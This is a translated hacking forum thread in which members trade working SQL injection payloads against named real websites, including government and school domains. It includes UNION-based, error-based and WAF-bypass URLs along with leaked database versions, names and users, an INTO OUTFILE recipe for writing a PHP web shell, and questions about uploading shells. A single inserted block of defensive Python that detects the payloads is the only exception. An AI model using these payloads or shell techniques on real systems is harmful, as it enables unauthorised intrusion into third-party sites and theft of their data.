Your questions about vulnerabilities.

Discussion in 'Vulnerabilities' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    It's /wp-content/plugins/module/ there,
    not /wp-content/themes/rttheme9/
    WordPress TimThumb Plugin
     
  2. попугай

    попугай Elder

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    That's binary, most likely, or a custom hashing scheme.

    There is no such thing as an Italian encoding; there are encodings that support Italian, and they are usually built into the browser: View -> Encoding, then pick one from the list.
     
  3. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    134
    Likes Received:
    26
    Reputations:
    5
    I have access to phpMyAdmin on the server; how can I upload a shell?
     
  4. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.onanistblog.ru/wp-content/plugins/nextgen-gallery
    I can't manage to upload a shell :)
     
  5. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+2
    ERROR!
    Code:
    http://www.kudosshowers.co.uk/gallery.php?id=-3+order+by+1
    Clean!
    But Union Select does not work.

    Code:
    http://www.kudosshowers.co.uk/gallery.php?id=-3+and+1=0+union+select+1
    Gives error, any solution?
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.kudosshowers.co.uk/gallery.php?id=-3+and+0+union+select+version()--+

    Open the source

    <img src="images/logo-5.1.41-3ubuntu12.10.jpg"
     
    _________________________
    1 person likes this.
  7. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thanks a lot.

    Code:
    <tr><td colspan="4"><img src="images/logo-5.1.41-3ubuntu12.10.jpg" alt="Gallery" title="Gallery" /><td></tr>
    What about this?

    Code:
    http://hcpoa.com/readnews.php?id=null+union+all+select+1,2,3,4+--+
     
  8. lion-art

    lion-art Banned

    Joined:
    30 Oct 2011
    Messages:
    37
    Likes Received:
    8
    Reputations:
    1

    http://hcpoa.com/readnews.php?id=1+or+1+group+by+concat(version(),floor(rand(0)*2)%20)having+min(0)+or+1--+

    Duplicate entry '3.23.581' for key 1
     
    2 people like this.
  9. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Antichat has taught me so much now.

    Thanks for the fix.
     
  10. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Hi everyone!)
    Comrades who work with SQL injections:
    recommend a program, or better, tell me which one you use to find them, because mine seems to have died off(
     
  11. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    136
    Reputations:
    37
    A dork, and go from there
    MySQLi helps me a lot
    I'm not giving a link (by PM)
     
  12. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Help me figure this out
    http://www.cideko.com/pro_con.php?id=3 - group by works, but union select gives an error
    and
    http://www.greenbergresearch.com/index.php?ID=1 is the same

    I just can't get around the filtering
     
  13. Ereee

    Ereee Elder

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Code:
    http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(database())),14--+f

    Warning: main(/var/www/html/inc/templates/greenbergdevDB): failed to open stream: No such file or directory in /var/www/html/index.php on line 195

    http://www.greenbergresearch.com/index.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(hex(user())),14--+f

    Warning: main(/var/www/html/inc/templates/greenbergUser@localhost): failed to open stream: No such file or directory in /var/www/html/index.php on line 195
     
    #18553 Ereee, 8 Dec 2011
    Last edited: 8 Dec 2011
  14. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    zenon3

    It's MySQL 3 here, which is why it complains about the union of queries
     
    _________________________
  15. Skofield

    Skofield Elder

    Joined:
    27 Aug 2008
    Messages:
    952
    Likes Received:
    318
    Reputations:
    52
    Code:
    CREATE TABLE `test_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; INSERT INTO `test_shell` ( `shl` ) VALUES (`пхп-код`); SELECT `shl` FROM `test_shell` INTO OUTFILE `путь/имяфайла.php` DROP TABLE `test_shell`
     
    1 person likes this.
  16. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    14
    Likes Received:
    2
    Reputations:
    0
    Is it realistic to upload an image with PHP code inside and have that code survive the processing?
    This gets added at the start of the file: CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90
    and the PHP code gets wiped, naturally
     
  17. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    help

    I have a WAF problem..

    Code:
    http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+
    Code:
    http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+
    But can't find vulnerable number!

    Any help?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+

    lightangel

    Try to understand the principle of injection.

    There is no need to add a quote after the vulnerable parameter if the injection type is INTEGER; you'll just break the syntax.
     
    _________________________
    #18558 Konqi, 9 Dec 2011
    Last edited: 9 Dec 2011
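
For defenders reading the two posts above, an added example (not part of the thread and not any poster's code): the keyword obfuscation quoted there stops hiding `UNION SELECT` once a request value is decoded and normalized, and a strict integer check on the parameter rejects all three variants regardless. The parameter names in `INT_PARAMS`, the host, and the path are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are integer keys in the application being monitored.
INT_PARAMS = frozenset({"id", "page"})

VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)  # MySQL runs the body of /*! ... */
PLAIN = re.compile(r"/\*.*?\*/", re.S)            # ordinary /* ... */ comment
UNION_SELECT = re.compile(r"union.{0,40}?select", re.S)

def normalize(value: str) -> str:
    """Undo the keyword obfuscation before matching."""
    value = VERSIONED.sub(r" \1 ", value)  # keep the executable comment body
    value = PLAIN.sub("", value)           # rejoin keywords split by a comment
    return re.sub(r"\s+", " ", value).strip().lower()

def inspect(url: str) -> list[str]:
    """Return findings for one request URL; an empty list means nothing flagged."""
    findings = []
    # parse_qsl percent-decodes the value and turns '+' into a space.
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        # Primary control: an integer parameter accepts digits and nothing else.
        if name.lower() in INT_PARAMS and not re.fullmatch(r"[0-9]{1,10}", raw):
            findings.append(f"{name}: not an integer")
        # Secondary signal for triage; can false-positive on free-text parameters.
        if UNION_SELECT.search(normalize(raw)):
            findings.append(f"{name}: UNION SELECT")
    return findings

# Constructed request lines: host and path are placeholders, the parameter
# values repeat the obfuscation styles quoted in the thread.
SAMPLES = [
    "http://app.example.test/news.php?id=5",
    "http://app.example.test/news.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+",
    "http://app.example.test/news.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+",
    "http://app.example.test/news.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect(url) or "clean", url)
```

The integer check is the control that matters; the pattern match only helps label what was attempted when reviewing logs.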
  19. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thanks. Is this site vulnerable?

    Code:
    http://www.vidol.gov/dol_news.php?page=-3'
    And I did everything showing it's injectable.

    Problem is, I tried error based, only brings this error.
    Code:
    http://www.vidol.gov/dol_news.php?errmsg=You+have+specified+an+invalid+page+number.
    Any help?
     
  20. A_n_d_r_e_i

    A_n_d_r_e_i Active Member

    Joined:
    2 Sep 2009
    Messages:
    180
    Likes Received:
    250
    Reputations:
    27
    lightangel, read this article:
    http://forum.antichat.ru/thread104591.html
    (about sql inj)
    and this: http://forum.antichat.ru/threadnav43966-1-10.html
     